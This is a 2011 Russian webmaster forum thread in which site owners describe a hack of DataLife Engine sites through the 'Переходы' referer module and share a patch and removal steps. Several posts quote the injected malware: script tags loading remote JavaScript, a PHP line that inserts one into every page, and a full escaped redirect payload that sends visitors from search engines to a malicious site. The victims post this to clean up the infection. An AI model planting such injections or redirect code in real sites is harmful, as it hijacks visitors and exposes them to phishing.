Помощник
 |
|
|
|
|
Сообщение сайта
|
 Вирус на сайте (фишинговая ссылка) |
Jester
|
 2.8.2011, 21:37;
Ответить: Jester
Сообщение
#12
|
 Бывалый  Группа: User Сообщений: 428 Регистрация: 16.12.2008 Из: Украина Поблагодарили: 46 раз Репутация:  8 
 |
Вот исправления_http://jester-soft.ws/script/dle/dle_bugs/197276-vse-versii-nedostatochnaya-filtraciya-v-module-perehody.html
(gooodd @ 2.8.2011, 20:36)  Заплаток нет, стояла последняя версия, кстати с проплаченной лицензией. Пришлось снести переходы на всех сайтах, на сайте разработчика та же проблема. Заплатка есть! |
 |
|
|
writerman
|
3.8.2011, 2:22;
Ответить: writerman
Сообщение
#13
|
 Частый гость Группа: User Сообщений: 55 Регистрация: 17.3.2011 Из: Украина (г. Херсон) Поблагодарили: 3 раза Репутация: 0
|
Вы представьте у меня сегодня поже ломанули через модуль "переходы 8.9" в модуле был скрипт
<script src=http://p07a.chat.ru/c.js></script> а в модуле он выглядит так cake%3Cscript%20src=http://p07a.chat.ru/c.js%3E%3C%2Fscript%3E он какбы переманивает посетителей посещаемость упала совсем... поставил заплатки но не помагает, эта гадость cake%3Cscript%20src=http://p07a.chat.ru/c.js%3E%3C%2Fscript%3E появлятся практически через 30 мин после её удаления... Помогите!!! Прошу Вас! Сообщение отредактировал writerman - 3.8.2011, 2:23 -------------------- |
|
|
|
|
balboa
|
Сообщение
#14
|
|
Бывалый Группа: User Сообщений: 262 Регистрация: 14.3.2008 Поблагодарили: 60 раз Репутация: 6
|
(writerman @ 3.8.2011, 2:22) появлятся практически через 30 мин после её удаления... Помогите!!! Прошу Вас! Мне ТП на хостинге изменил права на запись файла 444. Сам менять теперь не могу. Это помогло блокировать авто-изменение файла скриптом. -------------------- |
|
|
|
Lenka
|
3.8.2011, 2:32;
Ответить: Lenka
Сообщение
#15
|
|
Бывалый Группа: User Сообщений: 498 Регистрация: 31.7.2008 Из: Россия Поблагодарили: 49 раз Репутация: 6
|
Видимо, программист модуля хитрый попался...
-------------------- |
|
|
|
|
writerman
|
3.8.2011, 3:43;
Ответить: writerman
Сообщение
#16
|
||
|
Частый гость Группа: User Сообщений: 55 Регистрация: 17.3.2011 Из: Украина (г. Херсон) Поблагодарили: 3 раза Репутация: 0
|
И вот сново!
еще и шаблон в придачу портит.....
вот что вноутри етого скрипта if(dle_admin == '' || dle_login_hash == ''){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20if%28query%20%21%3D%20null%29%20%7B%20document.location.href%3D%27http%3A//skachayfiles.archivstufffile.ru/%27+%27%3Fwkey%3D753766%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%20%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));} Короче нужно улалять модуль так прощё будет.... Ребята, Вы не поверитена моем втором сайте тот же скрипт! Удаляйте модуль переходы!!!!! Вот вам инстукция  (для тех кто может быть не знает как удалить модуль)Физической пользы от данного модуля абсолютно нет. Удаление модуля переходы: Удаляем всё из папки engine файлы: ajax\referer.php data\referer.conf.php , referer.perf.php inc\referer.php, include\referer.init.php modules\referer.php skins\images\referer.png referer\*.* install-referer.php Открываем /index.php Ищем: require_once ROOT_DIR . '/engine/init.php'; На следующей строке удаляем: require_once ENGINE_DIR . '/modules/referer.php'; Ищем: $tpl->set ( '{calendar}', $tpl->result['calendar'] ); На предыдущей строке удаляем: $tpl->set ( '{referer}', $referer_block ); { Откройте /templates/<НУЖНЫЙ ШАБЛОН>/main.tpl Удалите тег: {referer} Запустите phpmyadmin и выполните запрос: DROP TABLE IF EXISTS dle_referer; или удалите таблицу dle_referer в ручную. Если пригодилось то кнопка спасибо будет кстати=) -------------------- |
||
|
|
|
||
|
Maereo
|
3.8.2011, 9:20;
Ответить: Maereo
Сообщение
#17
|
 Новичок Группа: User Сообщений: 47 Регистрация: 13.5.2011 Из: Украина, г. Харьков Поблагодарили: 19 раз Репутация: 4
|
(Jester @ 2.8.2011, 20:37) Вот исправления_http://jester-soft.ws/script/dle/dle_bugs/197276-vse-versii-nedostatochnaya-filtraciya-v-module-perehody.html Заплатка есть! Спасибо! Помогло! |
|
|
|
|
bmp104
|
3.8.2011, 9:32;
Ответить: bmp104
Сообщение
#18
|
 Завсегдатай 
 Группа: Active User Сообщений: 687 Регистрация: 13.12.2010 Поблагодарили: 55 раз Репутация: 10
|
Ребята, Вы не поверитена моем втором сайте тот же скрипт! Ну еще бы, вы ведь его один и тот же устанавливали, качали нуллед версию? |
|
|
|
|
writerman
|
3.8.2011, 10:53;
Ответить: writerman
Сообщение
#19
|
|
Частый гость Группа: User Сообщений: 55 Регистрация: 17.3.2011 Из: Украина (г. Херсон) Поблагодарили: 3 раза Репутация: 0
|
Вот исправления_http://jester-soft.ws/script/dle/dle_bugs/197276-vse-versii-nedostatochnaya-filtraciya-v-module-perehody.html Заплатка есть! Спасибо! Помогло! У меня стоял модуль Переходов 8.9 на этом сайте написано что P.S: дистриб Переходов 8.9, данный фикс там уже есть И я пробовал все багфиксы ставить не помогает через 30 мин после установки фиксов скрипт сново на сайте... Ребята, Вы не поверитена моем втором сайте тот же скрипт! Ну еще бы, вы ведь его один и тот же устанавливали, качали нуллед версию? Нет не один и тот же на втором сайте Версия 8.4 -------------------- |
|
|
|
|
StAlKeR-xXl
|
3.8.2011, 11:00;
Ответить: StAlKeR-xXl
Сообщение
#20
|
 Завсегдатай Группа: Active User Сообщений: 655 Регистрация: 14.8.2009 Поблагодарили: 170 раз Репутация: 43
|
DLE - зло...
 но приносит бабло |
|
|
|
|
balboa
|
Сообщение
#21
|
|
Бывалый Группа: User Сообщений: 262 Регистрация: 14.3.2008 Поблагодарили: 60 раз Репутация: 6
|
Вот код фишинговой ссылки из index.php
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<script src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);
-------------------- |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
 Быстрый и качественный обмен на сайте Baksman.orgОбмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк |
52 | Baksman | 33586 | Вчера, 5:02 автор: Baksman |
 |
Боты могут делать пушподписки на моём сайте? | 0 | Megaspryt | 437 | 17.4.2024, 23:29 автор: Megaspryt |
|
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте | 36 | CryptoCLoud | 10638 | 16.4.2024, 16:02 автор: CryptoCLoud |
|
Странный трафик на сайте длительное время | 33 | TABAK | 8768 | 12.4.2024, 5:56 автор: Skyworker |
|
Вечные ссылки с 300+ СДЛов, тиц до 750, ЯКи, DMOZ, от 1$/ссылка вечные ссылки |
259 | SeoUaSales | 129207 | 30.3.2024, 18:27 автор: Hillel_Silver |
|
Текстовая версия | Сейчас: 19.4.2024, 16:39 |
